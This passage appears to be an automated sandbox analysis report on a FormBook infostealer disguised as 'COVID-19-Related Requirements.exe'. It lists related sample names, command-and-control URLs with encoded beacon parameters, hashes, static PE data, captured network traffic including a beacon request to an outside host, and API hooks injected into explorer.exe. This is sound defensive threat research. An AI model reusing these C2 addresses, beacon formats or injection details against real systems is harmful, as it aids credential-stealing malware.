                                        • www.justswap.exchange/nvj9/?w2=Gj4Cv32t3ARgUuXe7mKAQ+9mCrtvpk7DjPJ1bxEeyJuHh3fNmA6VhARMN5MdM72+c2+4&BX=7nEt_PI
                                        porosi e re Fature Proforma.exeGet hashmaliciousBrowse
                                        • www.viltais.com/nt8e/?v2Mp4=lPNjsY1H0UkcK2guRo/z/De4MaZSsgXVmjo1l8Wqu/JQpRHkDmjukntjJMa7ZMKbETQi&jJBP5D=-ZpPy
                                        b9f9ceb8_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • www.justswap.exchange/nvj9/?RTE=Gj4Cv32t3ARgUuXe7mKAQ+9mCrtvpk7DjPJ1bxEeyJuHh3fNmA6VhARMN5MdM72+c2+4&3f=Yl9ts0nH4VD
                                        bd729c36_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • www.viltais.com/nt8e/?vZR=lPNjsY1H0UkcK2guRo/z/De4MaZSsgXVmjo1l8Wqu/JQpRHkDmjukntjJP2SaM2jNwl04iDf7w==&W6=GtSP
                                        2UPdDxaAmt.exeGet hashmaliciousBrowse
                                        • www.newmopeds.com/p2io/?s0=bSK1RxPJHkVUetqtOJ2LeA3okZHmhG3V4GZ2PZxkhAIUk0ADTbWPbz8cbcY6DQmi/D1z&CN9=7nH8PLV
                                        Quotation.exeGet hashmaliciousBrowse
                                        • www.rafbar.com/u8nw/?Jt7=XPIXpRuH&GFNl=GTZNlL4u2lC1Us00w2siTAOBcwC+lUBY5op6as4vfiu2ndyHOwS1IzefqZ4Rbcnj4tA2LprXag==
                                        Ydomibnfzakfagtujeyntncjklfpfrinlj_Signed_.exeGet hashmaliciousBrowse
                                        • www.clinics.life/qku9/?IN9d=wPjLqqQ4Fl5oGjCEKguj45taGc7fhq386dHHgSG17iY4BIOMpTzTtH7Yrt6PJ8P24DEX&gP=i4sxnJKX8dtd9Pgp
                                        PO.exeGet hashmaliciousBrowse
                                        • www.rafbar.com/u8nw/?YrCLWRfh=GTZNlL4u2lC1Us00w2siTAOBcwC+lUBY5op6as4vfiu2ndyHOwS1IzefqZ0oX9Ljvrcn&Dzut_N=3f-4
                                        Shipment of your goods.exeGet hashmaliciousBrowse
                                        • www.sanacolitademarijuana.com/u8nw/?1bg=GRA4xl5P9bMxjT&ohuXP=9bHYKsyT0auyBBl4ZenxQUebR4YwlP18dAkCPCATYDDxMs1xZZCxfJgyFNCzTUiCnFtm
                                        proforma invoice.exeGet hashmaliciousBrowse
                                        • www.winnipegwebdesigners.com/3edq/?h0DlqTn=j6hslNEQJPAVvjaOLLEjXAx9dXQUFsZcczIoxk2Yy06r67OJvuHcSxzhVKPXou/JjSZC&uZiT=NXEP9
                                        92bd9987_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • www.aideliveryrobot.com/p2io/?Ulm=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCXeRXe31/VGONAQ+A==&SVg84P=yjR8DXLxiJb
                                        e759c6e8_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • www.aideliveryrobot.com/p2io/?rVLp5Z=S0GhCH_&RPx=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ

                                        Domains

                                        No context

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        AMAZON-02US36157BCD02A5C23A3D161CEF0E3AACC07C73E91E0A98C.exeGet hashmaliciousBrowse
                                        • 3.14.182.203
                                        2uvK1XSXZf.dllGet hashmaliciousBrowse
                                        • 13.225.75.73
                                        6A4s59D7KF.dllGet hashmaliciousBrowse
                                        • 13.225.75.73
                                        N20210526.exeGet hashmaliciousBrowse
                                        • 52.58.78.16
                                        Po_23456.pdf.exeGet hashmaliciousBrowse
                                        • 52.58.78.16
                                        Qgc2Nreer3.exeGet hashmaliciousBrowse
                                        • 13.224.195.25
                                        Pdf Scen Invoice 17INV06003.exeGet hashmaliciousBrowse
                                        • 13.248.216.40
                                        DHL4198278Err-PDF.exeGet hashmaliciousBrowse
                                        • 99.83.154.118
                                        RFQ_BRAT_METAL_TECH_LTD.exeGet hashmaliciousBrowse
                                        • 52.58.78.16
                                        MkV1zeHKw7.exeGet hashmaliciousBrowse
                                        • 13.59.53.244
                                        SWIFT_EU.EXEGet hashmaliciousBrowse
                                        • 52.58.78.16
                                        henry.exeGet hashmaliciousBrowse
                                        • 75.2.73.220
                                        Perpetual.htmlGet hashmaliciousBrowse
                                        • 143.204.9.105
                                        Agreement_052521.htmlGet hashmaliciousBrowse
                                        • 52.218.185.241
                                        Descripciones de oferta de productos MACIILIAS SRL doc.exeGet hashmaliciousBrowse
                                        • 3.143.65.214
                                        POSWM240521.exeGet hashmaliciousBrowse
                                        • 18.130.194.62
                                        Contract 2021080378818.xlsxGet hashmaliciousBrowse
                                        • 54.254.146.151
                                        62793461217570C728ED7673B4BBFD7BB54BE067CDB61.exeGet hashmaliciousBrowse
                                        • 3.138.45.170
                                        FiYBg9R8m0.exeGet hashmaliciousBrowse
                                        • 3.129.187.220
                                        Ohki Blower Skid Base Enquiry 052521.exeGet hashmaliciousBrowse
                                        • 52.58.78.16

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\COVID-19-Related Requirements.exe.log
                                        Process:C:\Users\user\Desktop\COVID-19-Related Requirements.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.940725034452451
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:COVID-19-Related Requirements.exe
                                        File size:462336
                                        MD5:7efd588df5d918372c111708f02cc3ce
                                        SHA1:de98b083ed7e8b78be25cacf0715d15dd04228f5
                                        SHA256:de0011128191babcbdb339d2ab7f9568e0b12c5ebc00a99c235fea849885b6a1
                                        SHA512:3524900a08f222c1ab8a70508b53fd87f2dcf01b69b97273456a545ca2a4604afbf4371012ea7f46fba815a1ad7e046a94b3a9b8c4b13676a5419a4178bf47a8
                                        SSDEEP:12288:kn2Byh3FxTBNbrLsosmso27j5vVZhlmcoahAtED:kni83XPLNsmsow5vVflevtE
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O.`..............0.............Z#... ...@....@.. ....................................@................................

                                        File Icon

                                        Icon Hash:00828e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x47235a
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x60AE4FA6 [Wed May 26 13:39:50 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        inc ecx
                                        dec esi
                                        inc esp
                                        push edx
                                        dec edi
                                        dec ecx
                                        inc esp
                                        and dword ptr [eax], eax
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x723080x4f.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x740000x5dc.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x760000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x703680x70400False0.950884778675data7.94983598919IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rsrc0x740000x5dc0x600False0.439453125data4.22075312592IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x760000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_VERSION0x740900x34cdata
                                        RT_MANIFEST0x743ec0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Version Infos

                                        DescriptionData
                                        Translation0x0000 0x04b0
                                        LegalCopyrightCopyright 2013 - 2021
                                        Assembly Version1.0.4.0
                                        InternalNameCo2vKXXLQkGY.exe
                                        FileVersion1.0.4
                                        CompanyName
                                        LegalTrademarks
                                        Comments
                                        ProductNameRebooting Image
                                        ProductVersion1.0.4
                                        FileDescriptionRebooting Image
                                        OriginalFilenameCo2vKXXLQkGY.exe

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 26, 2021 20:00:30.561769009 CEST4974880192.168.2.652.58.78.16
                                        May 26, 2021 20:00:30.605720043 CEST804974852.58.78.16192.168.2.6
                                        May 26, 2021 20:00:30.605825901 CEST4974880192.168.2.652.58.78.16
                                        May 26, 2021 20:00:30.606018066 CEST4974880192.168.2.652.58.78.16
                                        May 26, 2021 20:00:30.647995949 CEST804974852.58.78.16192.168.2.6
                                        May 26, 2021 20:00:30.648032904 CEST804974852.58.78.16192.168.2.6
                                        May 26, 2021 20:00:30.648051023 CEST804974852.58.78.16192.168.2.6
                                        May 26, 2021 20:00:30.648365974 CEST4974880192.168.2.652.58.78.16
                                        May 26, 2021 20:00:30.648566961 CEST4974880192.168.2.652.58.78.16
                                        May 26, 2021 20:00:30.690713882 CEST804974852.58.78.16192.168.2.6

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 26, 2021 19:58:25.012042046 CEST6426753192.168.2.68.8.8.8
                                        May 26, 2021 19:58:25.061579943 CEST53642678.8.8.8192.168.2.6
                                        May 26, 2021 19:58:25.777455091 CEST4944853192.168.2.68.8.8.8
                                        May 26, 2021 19:58:25.828602076 CEST53494488.8.8.8192.168.2.6
                                        May 26, 2021 19:58:26.096816063 CEST6034253192.168.2.68.8.8.8
                                        May 26, 2021 19:58:26.168008089 CEST53603428.8.8.8192.168.2.6
                                        May 26, 2021 19:58:26.549149990 CEST6134653192.168.2.68.8.8.8
                                        May 26, 2021 19:58:26.602003098 CEST53613468.8.8.8192.168.2.6
                                        May 26, 2021 19:58:27.362481117 CEST5177453192.168.2.68.8.8.8
                                        May 26, 2021 19:58:27.412054062 CEST53517748.8.8.8192.168.2.6
                                        May 26, 2021 19:58:28.206619024 CEST5602353192.168.2.68.8.8.8
                                        May 26, 2021 19:58:28.259442091 CEST53560238.8.8.8192.168.2.6
                                        May 26, 2021 19:58:29.237461090 CEST5838453192.168.2.68.8.8.8
                                        May 26, 2021 19:58:29.292586088 CEST53583848.8.8.8192.168.2.6
                                        May 26, 2021 19:58:30.378185034 CEST6026153192.168.2.68.8.8.8
                                        May 26, 2021 19:58:30.431212902 CEST53602618.8.8.8192.168.2.6
                                        May 26, 2021 19:58:31.327795029 CEST5606153192.168.2.68.8.8.8
                                        May 26, 2021 19:58:31.377475023 CEST53560618.8.8.8192.168.2.6
                                        May 26, 2021 19:58:32.215584993 CEST5833653192.168.2.68.8.8.8
                                        May 26, 2021 19:58:32.265959024 CEST53583368.8.8.8192.168.2.6
                                        May 26, 2021 19:58:33.039597034 CEST5378153192.168.2.68.8.8.8
                                        May 26, 2021 19:58:33.098027945 CEST53537818.8.8.8192.168.2.6
                                        May 26, 2021 19:58:34.461113930 CEST5406453192.168.2.68.8.8.8
                                        May 26, 2021 19:58:34.510832071 CEST53540648.8.8.8192.168.2.6
                                        May 26, 2021 19:58:35.378665924 CEST5281153192.168.2.68.8.8.8
                                        May 26, 2021 19:58:35.428589106 CEST53528118.8.8.8192.168.2.6
                                        May 26, 2021 19:58:36.308442116 CEST5529953192.168.2.68.8.8.8
                                        May 26, 2021 19:58:36.358377934 CEST53552998.8.8.8192.168.2.6
                                        May 26, 2021 19:58:37.164037943 CEST6374553192.168.2.68.8.8.8
                                        May 26, 2021 19:58:37.214018106 CEST53637458.8.8.8192.168.2.6
                                        May 26, 2021 19:58:38.040323973 CEST5005553192.168.2.68.8.8.8
                                        May 26, 2021 19:58:38.092006922 CEST53500558.8.8.8192.168.2.6
                                        May 26, 2021 19:58:38.924808025 CEST6137453192.168.2.68.8.8.8
                                        May 26, 2021 19:58:38.977406025 CEST53613748.8.8.8192.168.2.6
                                        May 26, 2021 19:58:39.788191080 CEST5033953192.168.2.68.8.8.8
                                        May 26, 2021 19:58:39.837759018 CEST53503398.8.8.8192.168.2.6
                                        May 26, 2021 19:58:59.119628906 CEST6330753192.168.2.68.8.8.8
                                        May 26, 2021 19:58:59.189332962 CEST53633078.8.8.8192.168.2.6
                                        May 26, 2021 19:59:18.691482067 CEST4969453192.168.2.68.8.8.8
                                        May 26, 2021 19:59:18.751732111 CEST53496948.8.8.8192.168.2.6
                                        May 26, 2021 19:59:19.418623924 CEST5498253192.168.2.68.8.8.8
                                        May 26, 2021 19:59:19.484973907 CEST53549828.8.8.8192.168.2.6
                                        May 26, 2021 19:59:20.127902985 CEST5001053192.168.2.68.8.8.8
                                        May 26, 2021 19:59:20.186115980 CEST53500108.8.8.8192.168.2.6
                                        May 26, 2021 19:59:20.774699926 CEST6371853192.168.2.68.8.8.8
                                        May 26, 2021 19:59:20.834909916 CEST53637188.8.8.8192.168.2.6
                                        May 26, 2021 19:59:21.067723989 CEST6211653192.168.2.68.8.8.8
                                        May 26, 2021 19:59:21.129338980 CEST53621168.8.8.8192.168.2.6
                                        May 26, 2021 19:59:21.408696890 CEST6381653192.168.2.68.8.8.8
                                        May 26, 2021 19:59:21.458370924 CEST53638168.8.8.8192.168.2.6
                                        May 26, 2021 19:59:22.096962929 CEST5501453192.168.2.68.8.8.8
                                        May 26, 2021 19:59:22.147989035 CEST53550148.8.8.8192.168.2.6
                                        May 26, 2021 19:59:22.663640022 CEST6220853192.168.2.68.8.8.8
                                        May 26, 2021 19:59:22.725488901 CEST53622088.8.8.8192.168.2.6
                                        May 26, 2021 19:59:24.745949030 CEST5757453192.168.2.68.8.8.8
                                        May 26, 2021 19:59:24.796406984 CEST53575748.8.8.8192.168.2.6
                                        May 26, 2021 19:59:26.713046074 CEST5181853192.168.2.68.8.8.8
                                        May 26, 2021 19:59:26.767188072 CEST53518188.8.8.8192.168.2.6
                                        May 26, 2021 19:59:28.418070078 CEST5662853192.168.2.68.8.8.8
                                        May 26, 2021 19:59:28.479312897 CEST53566288.8.8.8192.168.2.6
                                        May 26, 2021 19:59:39.410810947 CEST6077853192.168.2.68.8.8.8
                                        May 26, 2021 19:59:39.476773977 CEST53607788.8.8.8192.168.2.6
                                        May 26, 2021 20:00:02.467072964 CEST5379953192.168.2.68.8.8.8
                                        May 26, 2021 20:00:02.526500940 CEST53537998.8.8.8192.168.2.6
                                        May 26, 2021 20:00:10.380151987 CEST5468353192.168.2.68.8.8.8
                                        May 26, 2021 20:00:10.438338995 CEST53546838.8.8.8192.168.2.6
                                        May 26, 2021 20:00:12.148670912 CEST5932953192.168.2.68.8.8.8
                                        May 26, 2021 20:00:12.209837914 CEST53593298.8.8.8192.168.2.6
                                        May 26, 2021 20:00:30.471061945 CEST6402153192.168.2.68.8.8.8
                                        May 26, 2021 20:00:30.536492109 CEST53640218.8.8.8192.168.2.6

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        May 26, 2021 20:00:30.471061945 CEST192.168.2.68.8.8.80x5c0cStandard query (0)www.portablesteamsaunas.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        May 26, 2021 20:00:30.536492109 CEST8.8.8.8192.168.2.60x5c0cNo error (0)www.portablesteamsaunas.com52.58.78.16A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.portablesteamsaunas.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.64974852.58.78.1680C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 26, 2021 20:00:30.606018066 CEST5463OUTGET /cgsp/?zR-4q=wCZjRreTETPxpz3yzi5aMK9lgrBwWrXWegbflPnh9KjaaDHMPgi5SZz4hafy+YGLKOgeKwGRDg==&hB0=D8yhC83P6d34H HTTP/1.1
                                        Host: www.portablesteamsaunas.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        May 26, 2021 20:00:30.648032904 CEST5463INHTTP/1.1 410 Gone
                                        Server: openresty
                                        Date: Wed, 26 May 2021 17:59:16 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 37 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 70 6f 72 74 61 62 6c 65 73 74 65 61 6d 73 61 75 6e 61 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 34 33 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 70 6f 72 74 61 62 6c 65 73 74 65 61 6d 73 61 75 6e 61 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 7<html>9 <head>57 <meta http-equiv='refresh' content='5; url=http://www.portablesteamsaunas.com/' />a </head>9 <body>43 You are being redirected to http://www.portablesteamsaunas.coma </body>8</html>0


                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function NameHook TypeActive in Processes
                                        PeekMessageAINLINEexplorer.exe
                                        PeekMessageWINLINEexplorer.exe
                                        GetMessageWINLINEexplorer.exe
                                        GetMessageAINLINEexplorer.exe

                                        Processes

                                        Process: explorer.exe, Module: user32.dll
                                        Function NameHook TypeNew Data
                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEA
                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEA
                                        GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEA
                                        GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEA

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        Analysis Process: COVID-19-Related Requirements.exe PID: 6852 Parent PID: 6080

                                        General

                                        Start time:19:58:32
                                        Start date:26/05/2021
                                        Path:C:\Users\user\Desktop\COVID-19-Related Requirements.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\COVID-19-Related Requirements.exe'
                                        Imagebase:0xef0000
                                        File size:462336 bytes
                                        MD5 hash:7EFD588DF5D918372C111708F02CC3CE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.434950366.0000000004299000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Analysis Process: COVID-19-Related Requirements.exe PID: 6884 Parent PID: 6852

                                        General

                                        Start time:19:59:18
                                        Start date:26/05/2021
                                        Path:C:\Users\user\Desktop\COVID-19-Related Requirements.exe
                                        Wow64 process (32bit):false
                                        Commandline:{path}
                                        Imagebase:0x350000
                                        File size:462336 bytes
                                        MD5 hash:7EFD588DF5D918372C111708F02CC3CE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        Analysis Process: COVID-19-Related Requirements.exe PID: 7004 Parent PID: 6852

                                        General

                                        Start time:19:59:18
                                        Start date:26/05/2021
                                        Path:C:\Users\user\Desktop\COVID-19-Related Requirements.exe
                                        Wow64 process (32bit):false
                                        Commandline:{path}
                                        Imagebase:0x240000
                                        File size:462336 bytes
                                        MD5 hash:7EFD588DF5D918372C111708F02CC3CE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        Analysis Process: COVID-19-Related Requirements.exe PID: 6964 Parent PID: 6852

                                        General

                                        Start time:19:59:19
                                        Start date:26/05/2021
                                        Path:C:\Users\user\Desktop\COVID-19-Related Requirements.exe
                                        Wow64 process (32bit):true
                                        Commandline:{path}
                                        Imagebase:0xf40000
                                        File size:462336 bytes
                                        MD5 hash:7EFD588DF5D918372C111708F02CC3CE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.481749515.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.484219002.0000000001960000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.484584798.0000000001990000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Analysis Process: explorer.exe PID: 3440 Parent PID: 6964

                                        General

                                        Start time:19:59:21
                                        Start date:26/05/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
